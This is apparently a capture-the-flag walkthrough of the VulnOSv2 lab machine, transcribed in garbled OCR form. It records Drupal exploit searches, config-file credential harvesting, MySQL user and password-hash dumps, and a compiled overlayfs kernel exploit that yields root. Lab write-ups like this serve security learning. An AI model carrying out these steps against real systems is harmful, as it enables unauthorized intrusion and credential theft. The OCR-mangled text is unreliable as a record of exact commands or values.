vulnhub

View on GitHub

VulnOsV2

05 April 2022 10:26 PM

+ C O a 192.168.43.174\iabc1 •s Google Hacking DB PaytoadsAllTheThings... Vigenere Solver. mo... BLACK JABC Just Another Bimvare Con-pany Select a zage to JABC ! Your v,orld leader in Bioware What is JABC NOT? Human with a bit of technology What is JABC? with a bit of human

Drupal Drupal Drupal Drupal Drupat Drupal Drupal Drupal Drupal Drupat Drupal Drupal Drupal Drupal Drupal Drupal Drupal Drupal Drupal Drupal Drupal Drupa Drupal L-$ searchsploit Drupal 7 Exploit 4.0 5.2 1.31 - 'D 7.31 - 'Dr 7.31 - 'D l.x 5.1 Title - News Message HTML Injection 4.1/4.2 - Cross-site Scripting - comments PHP Injection 4.5.3 < 4.6.1 ' Attachment mod mime' Remote Command 7 . x - URL -Encoded Input HTML Injection - PHP Zend Hash at ion Vector 5.21/6.16 - Denial of Service 4. 4 6. Execution 15 - 7.0 < 1.0 < 1.0 < 1.0 < 7.0 < 1.12 Multiple persistent cross-site Scripting vulnerabilities 7.31 - 1.31 - 'Dwvopa I geddon' SQL Injection (Add Admin User) geddon' SQL Injection (Admin session) ' D#pal geddon' SQL Injection (POC) (Reset Password) (1) geddon' SQL Injection (Poc) (Reset Password) (2) geddon' SQL Injection (Remote Code Execution) - Multiple Vulnerabilities Module services - Remote code Execution 4.1.6 - Post Comments Remote Command Execution - Post Comments Remote Command Execution 5.22/6.16 - Multiple Vulnerabilities Denial of Service 1.34 - Denial of service 1.34 - ' Duupmflgeddon3' (Authenticated) Remote Code (Metasploit) 1.58 - geddon3' (Authenticated) Remote Code Execution (Poc) -.58 - .58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - geddon2 Remote Code Execution rup .58 / < 8.3.9 / < 8.4.6/ < 8.5.1 - geddon2' Remote Code Execution 8.3.9 / < 8.4.6 / < 8.5.1 - 'D 8.3.9 / < 8.4.6 / < 8.5.1-' geddon2' Remote Code Execution (Metasploit) geddon2' Remote Code Execution (Metasploit) Path php/webapps/21863. txt php/webapps/22940. txt php/webapps/1088. pl php/webapps/1821. php php/webapps/2 020. txt php/webapps/4510. txt php/dos/1Ø826. sh php/webapps/11ø6ø. txt php/webapps/34992. py php/webapps/44355. php php/webapps/34984. py php/webapps/34993. php php/webapps/3515Ø. php php/webapps/18564. txt php/webapps/41564. php php/webapps/3313. pl php/webapps/3312. pl php/webapps/33 06. txt php/dos/35415. txt php/dos/35415. txt php/webapps/4455 . rb php/webapps/44542. txt php/webapps/44449. rb php/webapps/44449. rb php/remote/44482. rb php/remote/44482. rb

Google Hacking DB /bin/nc PayloadsAllTheThings... Vigenere Solver- ww... Lxd Privilege Escalatio... GTFOBins Basic Linux Pr

Analyzing Drupat Files -rwxrwxrwx 1 root root 18599 Jan 15 'mysql', 'databasename' , ' database ' username ' password username ' password' 'localhost', 'host' 'port' 3306, 'myprefix_' , 'driver 'mysql', 'databasename' , ' database ' username ' password username ' password' * by To 'localhost' , 'maln ' using the setting. If have all database names prefix

-rw-r-- -rw-r -rwxrwxrwx 1 -rwxrwxrwx 1 root root 270 Jan 15 2014 /usr/share/drupa17/moduIes/simpIetest/tests/upgrade/drupal-6.user-no-password-token.dacamse . php root root 1114 Jan 15 2014 /usr/share/drupa17/modules/simpletest/tests/upgrade/drupaI-6.user-password-token. database . php '$s$DAKøøp3Dkojkf40/Uizyxenguxnjv' , root root 270 Apr 16 2016 /var/nw/html/jabc/modules/simpletest/tests/upgrade/drupal-6.user-no-password-token. database. php root root 1114 Apr 16 2016 /var/wam/html/jabc/moduIes/simpletest/tests/upgrade/drupaI-6.user-password-token. database . php ' $S$DAKøøp3Dkojkf40/lJizYxenguXnjv' ,

searching passwords in config PHP files ord' 'toor' , passL% vord' •ord' , ord' ' IDA S ; LU0rd passw $dbpass= ' toor' ; $dbuser= ' phpmyadmin ' ; // $cfg[ 'Servers ' 'AllowNom ord'] = TRUE; uord'] TRUE; define( 'DB_USER' , ' username_here' ) ; define( 'DB_USER' , 'root');

user –> root pass —> toor

mysql> use jabcdøcs; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; odm_access_log admin odm_category data odm_department odm_dept_perms odm_dept_reviewer udf user user 15 rows in odm odm odm_filetypes _ log odm odm_odmsys _ rights odm odm_settings odm odm odm _perms set (0.00 sec)

mysql> 21 21 select * username I id I 2 rows from odm user; I password I b78aae356709f8c31118ea613980954b I 1 084eø343aø486ff05530df6c705c8bb4 1 department I phone 5555551212 555 5555555 1 Email last name webminöexample.com I min guestaexample.com guest first web guest name webmin guest in set pw_reset_code I NULL (0.04 sec)

mysql> show databases; Database information_schema I drupa17 jabcdøcs mysql 6 performance_schema I phpmyadmin rows in set (ø.øø sec) mysql> use drupa17; Reading table information for completion of table and column names you can turn off this Database changed mysql> show tables; Tables_in_drupa17 actions aggregator _ category aggregator _ a re a tor feature to get a quicker startup with -A aggregator_category_feed aggregator_category_item item

mysql> select * from users; I uid I name I pass ted I access I login 01 status timezone NULL I mail I language I picture I init theme com I signature I signat data I NULL I I NULL I NULL 1 1 webmin I $S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug I VulnOSv2ölocaldomain.com I 812762 1 1462351302 1 1462351302 1 1 1 Europe/Berlin I I VulnOSvnlocaldomain. 2 rows in set (ø.øø sec) 1 mysql>

mysql> use mysql; Reading table information for completio You can turn off this feature to get a Database changed mysql> show tables; Tables_in_mysql columns_priv I db event func general_log help_category help_keyword help_relation help_topic host ndb_binlog_index

mysql> select * from user; I User I Host I password Is I Drop_priv I Reload_priv I Shutdown _ priv I process_priv I File_priv I Grant_p per _ priv I create_tmp_table_priv I Lock_tables_priv I Execute_priv I Repl_slav ate_routine_priv I Alter_routine_priv I Create_user_priv I Event_priv I Trigge er I x509_subject I max_questions I max_updates I max _ connections I I localhost I I vulnosv2 1 127.0.ø.1 1 root root root I *9CFBBC772F3F6CIØ6Ø2ØØ35386DA5BBBF1249A11 1 Y 01 I *9CFBBC772F3F6CIØ6Ø2ØØ35386DA5BBBF1249A11 1 Y 01 I *9CFBBC772F3F6CIØ6Ø2ØØ35386DA5BBBF1249A11 1 Y

Found webmin 1 98 (hash b78aae356709f8c31118ea613980954b)

webmi nosv2 : /tmp$ uname -a Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux webminöVulnOSv2 : /tmp$

Linux 5.9 Linux Linux Linux Linux Linux Kernel Kernel Kernel Kernel Kernel Kernel 2.6.19 < 3.11 < 4. 3.14-rcl 3.4 < 3.13. 'Net filter Local Privilege Escalation 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local privilege Escalation 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local privilege Escalation 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition privilege Escalation 2 (Ubuntu 13.04/13.10 - Local privilege Escalation (3) /10ca1/5ø135.c Iinux JinUk/local/41995.c /10ca1/37292.c Linux NONA/ local/ 37293. txt linux _ x86-64/10ca1/33516 _ x86-64/10ca1/31347 Linux

webminöVulnOSv2: /tmp$ gcc pric .c webminöVulnOSv2 :/tmp$ ./priv spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id whoami root -o priv # cd [root $$ Is flag. txt # cat flag. txt Hello and welcome. You successfully compromised the company Congratulations ! !! Hope you enjoyed it. What do you think of A. 1.? " JABC" and the server completely !!